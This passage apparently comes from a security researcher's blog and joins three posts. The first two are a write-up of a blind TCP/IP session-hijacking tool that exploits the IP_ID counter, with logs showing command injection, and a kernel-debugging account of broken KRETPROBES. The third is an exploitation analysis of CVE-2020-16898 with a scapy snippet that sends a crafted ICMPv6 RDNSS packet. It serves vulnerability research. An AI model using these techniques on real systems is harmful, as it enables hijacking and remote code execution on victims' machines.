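With the 0x3FF window this is roughly 4.2 million spoofed packets, which is consistent with the ~5 minutes mentioned above at a realistic packet rate; the smaller 0xFF window is safer but roughly four times more expensive.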

Important notes

  1. This type of attack is not limited to any specific OS, but rather leverages the “covert channel” created by implementing IP_ID as a global counter. In short, any OS which is vulnerable to the “Idle scan” is also vulnerable to the old-school blind TCP/IP hijacking attack.
  2. We need to be able to send spoofed IP packets to execute this attack.
  3. Our attack relies on “scanning” and constant “poking” of the IP_ID:
    • Any latency between the victim and the server affects this logic.
    • If the victim’s machine is overloaded (heavy or slow traffic), it obviously affects the attack. Appropriately measuring the victim’s networking performance might be necessary for correct tuning of the attack.

Proof-of-Concept

Originally, I implemented lkm’s attack in 2008 and tested it against Windows XP. When I ran the old compiled binary on a modern system, everything worked fine. However, when I took the original sources and recompiled them in a modern Linux environment, my tool stopped working(!). The new binary was not able to find the client’s port nor the SQN, while the old binary still worked perfectly fine. It was a riddle to me what was really happening. The output of the strace tool gave me some clues:

Generated packet from the old binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\353\234\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=24, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=24, msg_flags=0}, 0) = 40

Generated packet from the new binary:

sendmsg(4, {msg_name={sa_family=AF_INET, sin_port=htons(21), sin_addr=inet_addr("192.168.1.169")}, msg_namelen=16, msg_iov=[{iov_base="E\0\0(\0\0\0\0@\6\0\0\300\250\1\356\300\250\1\251\277\314\0\25\0\0\0224\0\0VxP\2\26\320\2563\0\0", iov_len=40}], msg_iovlen=1, msg_control=[{cmsg_len=28, cmsg_level=SOL_IP, cmsg_type=IP_PKTINFO, cmsg_data={ipi_ifindex=0, ipi_spec_dst=inet_addr("0.0.0.0"), ipi_addr=inet_addr("0.0.0.0")}}], msg_controllen=32, msg_flags=0}, 0) = 40

cmsg_len and msg_controllen have different values. However, I didn’t modify the source code, so how is that possible? Some GCC/glibc changes broke the functionality of sending the spoofed packet. I found the answer here:

https://sourceware.org/pipermail/libc-alpha/2016-May/071274.html

I needed to rewrite the spoofing function to make it work again in a modern Linux environment. However, to do that I needed to use a different API. I wonder how many non-offensive tools were broken by this change 🙂

Windows 7

I’ve tested this tool against a fully updated Windows 7. Surprisingly, rewriting the PoC was not the most difficult task… setting up a fully updated Windows 7 is much more problematic. Many updates break the update channel/service(!) itself and you need to fix it manually. Usually, that means manually downloading a specific KB and installing it in “safe mode”. That can “unlock” the update service so you can continue your work. In the end it took me around 2-3 days to get a fully updated Windows 7, and it looks like this:

192.168.1.132 – attacker’s IP address
192.168.1.238 – victim’s Windows 7 machine IP address
192.168.1.169 – FTP server running on Linux. I’ve tested ProFTPd and vsFTPd servers running under a git ToT kernel (5.11+)

This tool does not do appropriate per-victim “tuning”, which could significantly speed up the attack. However, in my specific case, the full attack (finding the client’s port, the server’s SQN, and the client’s SQN) took about 45 minutes.

I found old logs from attacking Windows XP (~2009) and the entire attack took almost an hour:

pi3-darkstar z_new # time ./test -r 192.168.254.20 -s 192.168.254.46 -l 192.168.254.31 -p 21 -P 5357 -c 49450 -C “PWD”

                …::: -=[ [d]evil_pi3 TCP/IP Blind Spoofer by Adam ‘pi3’ Zabrocki ]=- :::…

        [+] Trying to find client port
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [+] Second level of verifcation
        [+] Found port => 49456!
        [+] Veryfing… OK! 🙂

        [!!] Port is found (49456)! Let’s go further…

        [+] Trying to find server’s window SQN
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535
        [+] Rechecking…
       [+] Found server’s window SQN => 1874825280, with ACK => 758086748 with seq_offset => 65535

        [!!] SQN => 1874825280, with seq_offset => 65535

        [+] Trying to find server’s real SQN
        [+] Found server’s real SQN => 1874825279 => seq_offset 32767
        [+] Found server’s real SQN => 1874825277 => seq_offset 16383
        [+] Found server’s real SQN => 1874825275 => seq_offset 8191
        [+] Found server’s real SQN => 1874825273 => seq_offset 4095
        [+] Found server’s real SQN => 1874823224 => seq_offset 2047
        [+] Found server’s real SQN => 1874822199 => seq_offset 1023
        [+] Found server’s real SQN => 1874821686 => seq_offset 511
        [+] Found server’s real SQN => 1874821684 => seq_offset 255
        [+] Found server’s real SQN => 1874821555 => seq_offset 127
        [+] Found server’s real SQN => 1874821553 => seq_offset 63
        [+] Found server’s real SQN => 1874821520 => seq_offset 31
        [+] Found server’s real SQN => 1874821518 => seq_offset 15
        [+] Found server’s real SQN => 1874821509 => seq_offset 7
        [+] Found server’s real SQN => 1874821507 => seq_offset 3
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Rechecking…
        [+] Found server’s real SQN => 1874821505 => seq_offset 1
        [+] Found server’s real SQN => 1874821505 => seq_offset 1

        [!!] Real server’s SQN => 1874821505

        [+] Finish! check whether command was injected (should be :))

        [!] Next SQN [1874822706]

real    56m38.321s
user    0m8.955s
sys     0m29.181s
pi3-darkstar z_new #

Some more notes:

  • Sometimes you can see that the tool is spinning around the same value when trying to find the “server’s real SQN”. If the number in the parentheses next to it is 1, kill the attack, copy the calculated SQN (the value the tool was spinning around) and pass it as the SQN start parameter (-M). It should fix that edge case.
  • Sometimes scanning with a 64KB window can “overjump” the appropriate SQN bracket. You might want to reduce the window size. The tool should shrink the window automatically if it finishes scanning the full SQN range with the current window size without finding the correct value; nevertheless, that takes time. You might want to start scanning with a smaller window size from the beginning (but that implies a longer attack).
  • By default, the tool sends an ICMP message to the victim’s machine to read the IP_ID. However, I’ve also implemented the ability to read that field from any IP packet: the tool sends a standard SYN packet and waits for the reply to extract the IP_ID. Pass an appropriate open TCP port via the -P parameter. A minimal sketch of both probing ideas follows below.
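For illustration only (this is not the tool’s actual code), here is a minimal scapy sketch of the two IP_ID probing ideas described above; the victim address is a placeholder and the TCP port is the one from the example run:

#!/usr/bin/env python3
# Minimal IP_ID probe sketch (illustration only, not devil_pi3.c itself).
from scapy.all import IP, ICMP, TCP, sr1

victim = "192.168.1.238"   # placeholder: the victim's IP address

# Variant 1: ICMP echo - read the IP_ID from the IP header of the reply.
reply = sr1(IP(dst=victim)/ICMP(), timeout=2, verbose=False)
if reply is not None:
    print("IP_ID from ICMP reply:", reply[IP].id)

# Variant 2: SYN probe against an open TCP port (what -P selects) -
# the SYN+ACK (or RST) reply also carries an IP_ID in its IP header.
reply = sr1(IP(dst=victim)/TCP(dport=5357, flags="S"), timeout=2, verbose=False)
if reply is not None:
    print("IP_ID from TCP reply:", reply[IP].id)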

The tool can be found here:

http://site.pi3.com.pl/exp/devil_pi3.c

Closing words

Modern operating systems (like Windows 10) usually implement the IP_ID as a “local”, per-session counter. If you monitor the IP_ID within a specific session, you can see that it is simply incremented for each sent packet. However, each session has an independent IP_ID base.

Happy hacking,
Adam

The short story of broken KRETPROBES and OPTIMIZER in Linux Kernel


During the LKRG development process I’ve found that:

  • KRETPROBES have been broken since kernel 5.8 (fixed in an upcoming kernel)
  • The OPTIMIZER has not been doing a sufficient job since kernel 5.5

First things first – KPROBES and FTRACE:

The Linux kernel provides 2 amazing frameworks for hooking – K*PROBES and FTRACE. K*PROBES is the older, classic one – introduced in 2.6.9 (October 2004). FTRACE is a newer interface and might have smaller overhead compared to K*PROBES. I’m using the word “K*PROBES” because various types of K*PROBES are available in the kernel, including JPROBES, KRETPROBES and classic KPROBES. K*PROBES essentially enables the possibility to dynamically break into any kernel routine. What are the differences between the various K*PROBES?

  • KPROBES – can be placed on virtually any instruction in the kernel
  • JPROBES – were implemented using KPROBES. The main idea behind JPROBES was to employ a simple mirroring principle to allow seamless access to the probed function’s arguments. However, in 2017 JPROBES were deprecated. More information can be found here:
    https://lwn.net/Articles/735667/
  • KRETPROBES – sometimes called “return probes”; they also use KPROBES under the hood. KRETPROBES make it easy to execute a user-supplied routine on entry to and on return from the hooked function. However, KRETPROBES can’t be placed on arbitrary instructions.

When a KPROBE is registered, it makes a copy of the probed instruction and replaces the first byte(s) of the probed instruction with a breakpoint instruction (e.g., int3 on i386 and x86_64).

FTRACE is newer than K*PROBES and was initially introduced in kernel 2.6.27, which was released on October 9, 2008. FTRACE works completely differently: the main idea is based on instrumenting every compiled function (injecting a “long-NOP” instruction via GCC’s “-pg” option). When FTRACE is registered on a specific function, that “long-NOP” is replaced with a JUMP instruction pointing to trampoline code. The trampoline can then execute any pre-registered, user-defined hook.
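Kernel modules such as LKRG register these probes through the register_kprobe() / register_kretprobe() API. For a quick feel for KRETPROBES without writing a module, the tracefs dynamic-events interface can create one from user space – a minimal sketch, assuming tracefs is mounted at the usual location and the example symbol exists on your kernel (check /proc/kallsyms):

#!/usr/bin/env python3
# Illustration: create a KRETPROBE from user space via the tracefs
# dynamic-events interface (kprobe_events), then read the trace buffer.
# Run as root; the paths and the probed symbol are assumptions.
import time

TRACEFS = "/sys/kernel/debug/tracing"            # or /sys/kernel/tracing

# 'r:' creates a return probe (KRETPROBE); 'p:' would create a plain KPROBE.
with open(f"{TRACEFS}/kprobe_events", "a") as f:
    f.write("r:myretprobe do_sys_open $retval\n")

with open(f"{TRACEFS}/events/kprobes/myretprobe/enable", "w") as f:
    f.write("1\n")

time.sleep(1)                                    # let some events accumulate

with open(f"{TRACEFS}/trace") as f:
    print(f.read())

# Cleanup: disable the event and remove the probe.
with open(f"{TRACEFS}/events/kprobes/myretprobe/enable", "w") as f:
    f.write("0\n")
with open(f"{TRACEFS}/kprobe_events", "a") as f:
    f.write("-:myretprobe\n")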

A few words about Linux Kernel Runtime Guard (LKRG)

In short, LKRG performs runtime integrity checking of the Linux kernel (similar to PatchGuard technology from Microsoft) and detection of the various exploits against the kernel. LKRG attempts to post-detect and promptly respond to unauthorized modifications to the running Linux kernel (system integrity) or to corruption of the task integrity such as credentials (user/group IDs), SECCOMP/sandbox rules, namespaces, and more.
To be able to implement such functionality, LKRG must place various hooks in the kernel. KRETPROBES are used to fulfill that requirement.

LKRG’s KPROBES on FTRACE-instrumented functions

A careful reader might ask an interesting question: what will happen if a function is instrumented by FTRACE (has the injected “long-NOP”) and someone registers a K*PROBE on it? Does a dynamically registered FTRACE hook “overwrite” a K*PROBE installed on that function, and vice versa?

Well, this is a very common situation from LKRG’s perspective, since it places KRETPROBES on many syscalls. The Linux kernel uses a special type of K*PROBE in such cases, called an “FTRACE-based KPROBE”. Essentially, such a special KPROBE uses the FTRACE infrastructure and has very little to do with KPROBES itself. That’s interesting because it is also subject to FTRACE rules, e.g. if you disable the FTRACE infrastructure, such a special KPROBE won’t work either.

OPTIMIZER

Linux kernel developers went one step further and aggressively “optimize” all K*PROBES to use FTRACE instead. The main reason behind that is performance – FTRACE has smaller overhead. If for any reason a KPROBE can’t be optimized, the classic old-school KPROBES infrastructure is used.

When you analyze all the KRETPROBES placed by LKRG, you will realize that on modern kernels all of them are converted to some form of FTRACE 🙂
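One quick way to see this on a live system (a sketch; it assumes debugfs is mounted at the usual location and must run as root) is to dump the kprobes list, where such probes are flagged:

#!/usr/bin/env python3
# Dump the registered kprobes; entries may be flagged e.g. [OPTIMIZED],
# [FTRACE] or [DISABLED], depending on how the kernel installed them.
KPROBES_LIST = "/sys/kernel/debug/kprobes/list"   # assumed debugfs mount point

with open(KPROBES_LIST) as f:
    for line in f:
        print(line.rstrip())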

LKRG reports False Positives

After such a long introduction, we can finally move on to the topic of this article. Vitaly Chikunov from ALT Linux reported that when he runs the FTRACE stress tester, LKRG reports corruption of the .text section:

https://github.com/openwall/lkrg/issues/12

I spent a few weeks (a month+) on making LKRG detect and accept authorized third-party modifications to the kernel’s code placed via FTRACE. When I finally finished that work, I realized that, additionally, I needed to protect the global FTRACE knob (sysctl kernel.ftrace_enabled), which allows root to completely disable FTRACE on a running system. Otherwise, LKRG’s hooks might be unknowingly disabled, which not only disables its protections (kind of OK under a threat model where we trust host root), but may also lead to false positives (as without the hooks LKRG wouldn’t know which modifications are legitimate). I added that functionality, and everything was working fine…
… until kernel 5.9. This completely surprised me. I had not seen any significant changes in the FTRACE logic between 5.8.x and 5.9.x. I spent some time on it and finally realized that my protection of the global FTRACE knob had stopped working on the latest kernels (since 5.9). However, that code had not changed between kernel 5.8.x and 5.9.x. What’s the mystery?
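For context, the knob in question is an ordinary sysctl, so root can flip it at any time; a tiny sketch of reading it (standard procfs path):

#!/usr/bin/env python3
# The global FTRACE knob LKRG protects is just a sysctl: kernel.ftrace_enabled.
# Writing "0" here (as root) disables FTRACE system-wide, which also disables
# FTRACE-based KPROBES such as LKRG's hooks.
KNOB = "/proc/sys/kernel/ftrace_enabled"

with open(KNOB) as f:
    print("ftrace_enabled =", f.read().strip())

# To disable FTRACE globally (don't do this on a box relying on LKRG's hooks):
# with open(KNOB, "w") as f:
#     f.write("0\n")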

First problem – KRETPROBES are broken.

Starting from kernel 5.8, all non-optimized KRETPROBES don’t work. Until 5.8, when the int3 (#BP) exception was raised, a full NMI entry was not performed. Among others, the following logic was executed:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L589

if (!user_mode(regs)) {
    rcu_nmi_enter();
    preempt_disable();
}

In some older kernels the function ist_enter() was called instead. Inside that function we can see the following logic:
https://elixir.bootlin.com/linux/v5.7.19/source/arch/x86/kernel/traps.c#L91

if (user_mode(regs)) {
    RCU_LOCKDEP_WARN(!rcu_is_watching(), "entry code didn't wake RCU");
} else {
    /*
     * We might have interrupted pretty much anything.  In
     * fact, if we're a machine check, we can even interrupt
     * NMI processing.  We don't want in_nmi() to return true,
     * but we need to notify RCU.
     */
    rcu_nmi_enter();
}

preempt_disable();

As the comment says, “We don’t want in_nmi() to return true, but we need to notify RCU.” However, since kernel 5.8 the logic of how these exceptions are handled has been modified and we currently have this (function “exc_int3”):
https://elixir.bootlin.com/linux/v5.8/source/arch/x86/kernel/traps.c#L630

/*
 * idtentry_enter_user() uses static_branch_{,un}likely() and therefore
 * can trigger INT3, hence poke_int3_handler() must be done
 * before. If the entry came from kernel mode, then use nmi_enter()
 * because the INT3 could have been hit in any context including
 * NMI.
 */
if (user_mode(regs)) {
    idtentry_enter_user(regs);
    instrumentation_begin();
    do_int3_user(regs);
    instrumentation_end();
    idtentry_exit_user(regs);
} else {
    nmi_enter();
    instrumentation_begin();
    trace_hardirqs_off_finish();
    if (!do_int3(regs))
        die("int3", regs, 0);
    if (regs->flags & X86_EFLAGS_IF)
        trace_hardirqs_on_prepare();
    instrumentation_end();
    nmi_exit();
}

The root of this unlucky change is this commit:

https://github.com/torvalds/linux/commit/0d00449c7a28a1514595630735df383dec606812#diff-51ce909c2f65ed9cc668bc36cc3c18528541d8a10e84287874cd37a5918abae5

which was later modified by this commit:

https://github.com/torvalds/linux/commit/8edd7e37aed8b9df938a63f0b0259c70569ce3d2

and this is what we have in all kernels since 5.8. Essentially, KRETPROBES have not been working since these commits. We have the following logic:

asm_exc_int3() -> exc_int3():
                    |
    ----------------|
    |
    v
...
nmi_enter();
...
if (!do_int3(regs))
       |
  -----|
  |
  v
do_int3() -> kprobe_int3_handler():
                    |
    ----------------|
    |
    v
...
if (!p->pre_handler || !p->pre_handler(p, regs))
                             |
    -------------------------|
    |
    v
...
pre_handler_kretprobe():
...
    if (unlikely(in_nmi())) {
        rp->nmissed++;
        return 0;
    }

Essentially, exc_int3() calls nmi_enter(), and pre_handler_kretprobe(), before invoking the registered handler, checks via in_nmi() whether it is running in NMI context. Since the kernel-mode int3 path now always goes through nmi_enter(), that check always triggers: the KRETPROBE handler is silently skipped and only rp->nmissed is incremented.

I’ve reported this issue to the maintainers and it was addressed and correctly fixed. These patches are going to be backported to the stable tree (and hopefully to LTS kernels as well):

https://lists.openwall.net/linux-kernel/2020/12/09/1313

However, coming back to the original problem with LKRG… I didn’t see any issues with kernel 5.8.x, only with 5.9.x. That’s interesting, because KRETPROBES were broken in 5.8.x as well. So what’s going on?

As I mentioned at the beginning of the article, K*PROBES are aggressively optimized and converted to FTRACE. In kernel 5.8.x LKRG’s hook was correctly optimized and didn’t use KRETPROBES at all. That’s why I didn’t see any problems with that version. However, for some reason, such optimization was not possible in kernel 5.9.x. This resulted in placing a classic, non-optimized KRETPROBE, which we know is broken.

Second problem – the OPTIMIZER isn’t doing a sufficient job anymore.

I didn’t see any changes in the sources regarding the OPTIMIZER, nor in the hooked function itself. However, when I looked at the generated vmlinux binary, I saw padding at the end of the hooked function consisting of INT3 opcodes:

...
ffffffff8130528b:       41 bd f0 ff ff ff       mov    $0xfffffff0,%r13d
ffffffff81305291:       e9 fe fe ff ff          jmpq   ffffffff81305194
ffffffff81305296:       cc                      int3
ffffffff81305297:       cc                      int3
ffffffff81305298:       cc                      int3
ffffffff81305299:       cc                      int3
ffffffff8130529a:       cc                      int3
ffffffff8130529b:       cc                      int3
ffffffff8130529c:       cc                      int3
ffffffff8130529d:       cc                      int3
ffffffff8130529e:       cc                      int3
ffffffff8130529f:       cc                      int3

Such padding didn’t exist in this function in generated images for older kernels. Nevertheless, such padding is pretty common.

OPTIMIZER logic fails here:

try_to_optimize_kprobe() -> alloc_aggr_kprobe() -> __prepare_optimized_kprobe()
-> arch_prepare_optimized_kprobe() -> can_optimize():
/* Decode instructions */
addr = paddr - offset;
while (addr < paddr - offset + size) { /* Decode until function end */
    unsigned long recovered_insn;
    if (search_exception_tables(addr))
        /*
         * Since some fixup code will jumps into this function,
         * we can't optimize kprobe in this function.
         */
        return 0;
    recovered_insn = recover_probed_instruction(buf, addr);
    if (!recovered_insn)
        return 0;
    kernel_insn_init(&insn, (void *)recovered_insn, MAX_INSN_SIZE);
    insn_get_length(&insn);
    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;
    /* Recover address */
    insn.kaddr = (void *)addr;
    insn.next_byte = (void *)(addr + insn.length);
    /* Check any instructions don't jump into target */
    if (insn_is_indirect_jump(&insn) ||
        insn_jump_into_range(&insn, paddr + INT3_INSN_SIZE,
                 DISP32_SIZE))
        return 0;
    addr += insn.length;
}

One of the checks tries to protect against the situation where another subsystem has put a breakpoint there as well:

    /* Another subsystem puts a breakpoint */
    if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
        return 0;

However, that’s not the case here: the INT3_INSN_OPCODE is placed at the end of the function purely as padding, yet the check still rejects the probe.
I wanted to find out why INT3 padding is more common in the new kernels, while it’s not the case for older ones, even though I’m using exactly the same compiler and linker. I started browsing commits and found this one:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7705dc8557973d8ad8f10840f61d8ec805695e9e

diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
index b06d6e1188deb..3a1a819da1376 100644
--- a/arch/x86/kernel/vmlinux.lds.S
+++ b/arch/x86/kernel/vmlinux.lds.S
@@ -144,7 +144,7 @@ SECTIONS
 		*(.text.__x86.indirect_thunk)
 		__indirect_thunk_end = .;
 #endif
-	} :text = 0x9090
+	} :text =0xcccc
 
 	/* End of text section, which should occupy whole number of pages */
 	_etext = .;

It looks like INT3 is now the default padding used by the linker.

I brought up that problem with the Linux kernel developers (the KPROBES maintainers), and Masami Hiramatsu prepared an appropriate patch which fixes the problem:

https://lists.openwall.net/linux-kernel/2020/12/11/265

I’ve verified it and now it works well. Thanks to the LKRG development work, we helped identify and fix two interesting problems in the Linux kernel 🙂

Thanks,
Adam

CVE-2020-16898 – Exploiting “Bad Neighbor” vulnerability

Introduction

During the last Patch Tuesday (13th of October 2020), Microsoft fixed a very interesting (and sexy) vulnerability: CVE-2020-16898 – Windows TCP/IP Remote Code Execution Vulnerability (link). Microsoft’s description of the vulnerability:

“A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.
To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.”

This vulnerability is important enough that I decided to write a Proof-of-Concept for it. During my work there weren’t any public exploits for it, and I spent a significant amount of time analyzing all the caveats necessary for triggering the bug. Even now, the available information doesn’t provide sufficient details for triggering it. That’s why I’ve decided to summarize my experience. First, a short summary:

  • This bug can ONLY be exploited when the source address is a link-local IPv6 address. This requirement limits the potential targets!
  • The entire payload must be a valid IPv6 packet. If you screw up the headers too much, your packet will be rejected before triggering the bug
  • During packet size validation, every “Length” defined in the optional headers must be consistent with the packet size
  • This vulnerability allows smuggling an extra “header”. This header is not validated and includes its own “Length” field. After triggering the bug, that field will still be checked against the packet size
  • The Windows NDIS API which can trigger the bug has a very annoying optimization (from the exploitation perspective). To bypass it, you need to use fragmentation! Otherwise, you can trigger the bug, but it won’t result in memory corruption!

Collecting information about the vulnerability

At first, I wanted to learn more about the bug. The only extra information I could find was in the write-ups accompanying the published detection logic. It is quite a funny twist of fate that information on how to protect against the attack was helpful in exploitation 🙂 Write-ups:

The most crucial is the following information:

“While we ignore all Options that aren’t RDNSS, for Option Type = 25 (RDNSS), we check to see if the Length (second byte in the Option) is an even number. If it is, we flag it. If not, we continue. Since the Length is counted in increments of 8 bytes, we multiply the Length by 8 and jump ahead that many bytes to get to the start of the next Option (subtracting 1 to account for the length byte we’ve already consumed).”

OK, what have we learned from it? Quite a lot:

  • We need to send an RDNSS packet
  • The problem is an even number in the Length field
  • The function responsible for parsing the packet will treat the last 8 bytes of the RDNSS payload as the next header

That’s more than enough to start poking around. First, we need to generate a valid RDNSS packet.

RDNSS

Recursive DNS Server Option (RDNSS) is one of the sub-options for Router Advertisement (RA) message. RA can be sent via ICMPv6. Let’s look at the documentation for RDNSS (https://tools.ietf.org/html/rfc5006):

5.1. Recursive DNS Server Option
The RDNSS option contains one or more IPv6 addresses of recursive DNS
servers. All of the addresses share the same lifetime value. If it
is desirable to have different lifetime values, multiple RDNSS
options can be used. Figure 1 shows the format of the RDNSS option.

  0                   1                   2                   3
  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |     Type      |     Length    |           Reserved            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                           Lifetime                            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                                                               |
 :            Addresses of IPv6 Recursive DNS Servers            :
 |                                                               |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Description of the Length field:

 Length        8-bit unsigned integer.  The length of the option
               (including the Type and Length fields) is in units of
               8 octets.  The minimum value is 3 if one IPv6 address
               is contained in the option.  Every additional RDNSS
               address increases the length by 2.  The Length field
               is used by the receiver to determine the number of
               IPv6 addresses in the option.

This essentially means that the Length must always be an odd number, as long as there is any payload.
OK, let’s create an RDNSS packet. How? I’m using scapy, since it’s the easiest and fastest way to create whatever packets we want. It is very simple:

v6_dst = <destination address>
v6_src = <source address>

c = ICMPv6NDOptRDNSS()
c.len = 7
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

When we set up a kernel debugger and analyze the public symbols from the tcpip.sys driver, we can find interesting function names:

tcpip!Ipv6pHandleRouterAdvertisement
tcpip!Ipv6pUpdateRDNSS

Let’s set breakpoints there and see if our packet arrives:

0: kd> bp tcpip!Ipv6pUpdateRDNSS
0: kd> bp tcpip!Ipv6pHandleRouterAdvertisement
0: kd> g
Breakpoint 0 hit
tcpip!Ipv6pHandleRouterAdvertisement:
fffff804`483ba398 48895c2408      mov     qword ptr [rsp+8],rbx
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66ad8 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement
01 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
02 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
03 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
04 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
05 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
06 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
07 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
08 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
09 fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0a fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0b fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0c fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0d fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0
0: kd> g
...

Hm… OK. We never hit Ipv6pUpdateRDNSS, but we did hit Ipv6pHandleRouterAdvertisement. This means that our packet is basically fine. So why the hell did we not end up in Ipv6pUpdateRDNSS?

Problem 1 – IPv6 link-local address

We are failing validation of the address here:

fffff804`483ba4b4 458a02          mov     r8b,byte ptr [r10]
fffff804`483ba4b7 8d5101          lea     edx,[rcx+1]
fffff804`483ba4ba 8d5902          lea     ebx,[rcx+2]
fffff804`483ba4bd 41b7c0          mov     r15b,0C0h
fffff804`483ba4c0 4180f8ff        cmp     r8b,0FFh
fffff804`483ba4c4 0f84a8820b00    je      tcpip!Ipv6pHandleRouterAdvertisement+0xb83da (fffff804`48472772)
fffff804`483ba4ca 33c0            xor     eax,eax
fffff804`483ba4cc 498bca          mov     rcx,r10
fffff804`483ba4cf 48898570010000  mov     qword ptr [rbp+170h],rax
fffff804`483ba4d6 48898578010000  mov     qword ptr [rbp+178h],rax
fffff804`483ba4dd 4484d2          test    dl,r10b
fffff804`483ba4e0 0f8599820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb83e7 (fffff804`4847277f)
fffff804`483ba4e6 4180f8fe        cmp     r8b,0FEh
fffff804`483ba4ea 0f85ab820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb8403 (fffff804`4847279b) [br=0]

r10 points to the beginning of the address:

0: kd> dq @r10
ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d
ffffcb82`f9a5b04a  000052b0`80db12fd b7220a02`ea3b3a4d
ffffcb82`f9a5b05a  08070800`e56c0086 00000000`00000000
ffffcb82`f9a5b06a  ffffffff`00000719 aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b07a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b08a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b09a  aaaaaaaa`aaaaaaaa 63733a6e`12990c28
ffffcb82`f9a5b0aa  70752d73`616d6568 643a6772`6f2d706e

These bytes:

ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d

match the IPv6 address which I used as the source address:

v6_src = "fd12:db80:b052:0:5d7b:5d64:7c08:f5e5"

It is compared with the byte 0xFE. By looking here we can learn that:

fe80::/10 — Addresses in the link-local prefix are only valid and unique on a single link (comparable to the auto-configuration addresses 169.254.0.0/16 of IPv4).

OK, so it is looking for the link-local prefix. Another interesting check happens when we fail the previous one:

fffff804`4847279b e8f497f8ff      call    tcpip!IN6_IS_ADDR_LOOPBACK (fffff804`483fbf94)
fffff804`484727a0 84c0            test    al,al
fffff804`484727a2 0f85567df4ff    jne     tcpip!Ipv6pHandleRouterAdvertisement+0x166 (fffff804`483ba4fe)
fffff804`484727a8 4180f8fe        cmp     r8b,0FEh
fffff804`484727ac 7515            jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb842b (fffff804`484727c3)

It checks whether we are coming from LOOPBACK, and next we are validated again for being link-local. I modified the packet to use a link-local source address and…

Breakpoint 1 hit
tcpip!Ipv6pUpdateRDNSS:
fffff804`4852a534 4055            push    rbp
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66728 fffff804`48472cbf tcpip!Ipv6pUpdateRDNSS
01 fffff804`48a66730 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement+0xb8927
02 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
03 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
04 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
05 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
